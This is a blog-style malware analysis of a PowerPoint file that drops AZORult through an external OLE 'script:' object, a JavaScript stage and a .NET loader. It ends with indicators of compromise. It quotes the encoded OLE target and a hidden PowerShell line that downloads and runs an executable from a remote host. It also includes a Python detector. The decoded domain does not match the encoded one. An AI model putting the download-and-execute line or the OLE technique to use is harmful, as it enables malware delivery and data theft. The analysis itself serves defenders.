Friday, November 16, 2018

Microsoft Powerpoint as Malware Dropper

Nowadays Microsoft Office documents are often used to propagate malware, acting as dynamic droppers. Microsoft Excel with macros and Microsoft Word with user actions (such as links or external OLE objects) are the main players in this "Office dropping arena". When I figured out that a Microsoft PowerPoint presentation had been used to drop and execute a malicious payload I was amazed: it is not so common (at least in my personal experience), so I decided to write a little about it.

The "attack path" is very close to what has been observable in modern threats for years: an email campaign with an attached document and actionable text in it. At first the Microsoft PowerPoint presentation looked like a blank white page, but it performed a very interesting and hidden connection to: hxxps://a.doko.moe/wraeop.sct

Analysing the Microsoft PowerPoint structure, the following slide structure caught my eye.

Stage 1: Microsoft PowerPoint Dropping Website
An external OLE object (compatibility 2006) was referenced with the following Target value:
Target="%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74"  
Decoding that string from percent-encoded hex to ASCII makes it much more readable:

scrIPT:hxxps://a.dolo.moe/wraeop.sct

The external object is downloaded and executed as a script on the victim machine. The downloaded file (wraeop.sct) is JavaScript code representing Stage 2 of the infection process. It is shown as follows:
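As an added example (not code from the original post), a small Python triage helper that applies the decoding step above to slide relationship parts: it percent-decodes every external relationship Target found in a .pptx and flags targets whose case-folded scheme hands the object to a script host, which defeats the mixed-case "scrIPT:" trick. The sample relationship XML is constructed for this example around the Target value quoted above; scan_pptx and its path argument are assumptions for this example.

```python
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import unquote

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

# Constructed sample of a ppt/slides/_rels/slideN.xml.rels part.  The
# first relationship carries the percent-encoded Target seen in the post;
# the second is an ordinary internal slideLayout reference.
SAMPLE_RELS = (
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId3" Type="{OLE_TYPE}" '
    'Target="%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74" '
    'TargetMode="External"/>'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" '
    'Target="../slideLayouts/slideLayout1.xml"/>'
    '</Relationships>'
)

# URL schemes that make Office hand the "object" to a script engine.
SUSPICIOUS_SCHEMES = {"script", "mshta", "javascript", "vbscript"}


def scan_rels(rels_xml):
    """Return one finding per external relationship in a .rels part."""
    findings = []
    for rel in ET.fromstring(rels_xml).iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("TargetMode") != "External":
            continue                      # internal parts are not fetched
        raw = rel.get("Target", "")
        decoded = unquote(raw)            # %73%63... -> scrIPT:https://...
        scheme = decoded.split(":", 1)[0].lower()   # scrIPT -> script
        findings.append({
            "id": rel.get("Id"),
            "type": rel.get("Type"),
            "raw": raw,
            "decoded": decoded,
            "scheme": scheme,
            # Percent-encoding in an OLE target has no legitimate reason
            # to exist, so encoding alone is treated as a signal too.
            "suspicious": scheme in SUSPICIOUS_SCHEMES or raw != decoded,
        })
    return findings


def scan_pptx(path):
    """Walk a .pptx (a zip) and scan every slide relationship part."""
    results = {}
    with zipfile.ZipFile(path) as pkg:
        for name in pkg.namelist():
            if name.startswith("ppt/slides/_rels/") and name.endswith(".rels"):
                results[name] = scan_rels(pkg.read(name))
    return results
```

Running scan_rels(SAMPLE_RELS) yields a single finding with scheme "script", so a mail gateway or sandbox can flag the presentation before the slide is ever rendered.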

Stage 2: Executed Javascript
Decoding the 3.6K script makes it clear that one more stage is involved in the infection process. The following code is the execution path that drives Stage 2 to Stage 3.
var run = new ActiveXObject('WSCRIPT.Shell').Run(powershell  -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe', '%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe'); Start-Process '%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe' ); 
The script downloads a file named DAZZI.exe and saves it under a new name, VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe, in the system temporary directory before running it. The downloaded PE executable is a .NET file created with ExtendedScript Toolkit (according to its compilation time) on 2018-11-13 15:21:54 and submitted a few hours later to VirusTotal.

Stage 3: .NET file 
The third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload, or Stage 4. In other words, Stage 3 reads an image stored in the resource section of the PE file, extracts a payload from it and executes it. The final payload looks like AZORult malware. The evidence comes from traffic analysis, where the identified pattern sends (via HTTP POST) browser history data and specifically crafted files from under the user's AppData directory to specific PHP pages. Moreover, the command and control admin panel (hxxps://ominigrind.ml/azzi/panel/admin.php) looks like AZORult v3.


Stage 4: AZORult evidence


I hope you had fun with this, I did! It was super interesting to see the attackers' creativity and the way they act to include malicious content in Office documents. Microsoft should probably take care of this and try to filter external content, or ask for permission before including it, but this would still not be a complete solution (in my personal opinion). A deeper and more invasive check of the remote content would be needed. Stay tuned!

IoC:
Original Powerpoint: 6ae5583ec767b7ed16aaa45068a1239a827a6dae95387d5d147c58c7c5f71457
wraeop.sct: 4f38fcea4a04074d2729228fb6341d0c03363660f159134db35b4d259b071bb0
download1: hxxps://a.dolo.moe/wraeop.sct
download2: hxxp://batteryenhancer.com
DAZZI.exe: c26de4d43100d24017d82bffd1b8c5f1f9888cb749ad59d2cd02ef505ae59f40
Resource Img: 965b74e02b60c44d75591a9e71c94e88365619fe1f82208c40be518865a819da
C2: hxxps://ominigrind.ml/azzi/index.php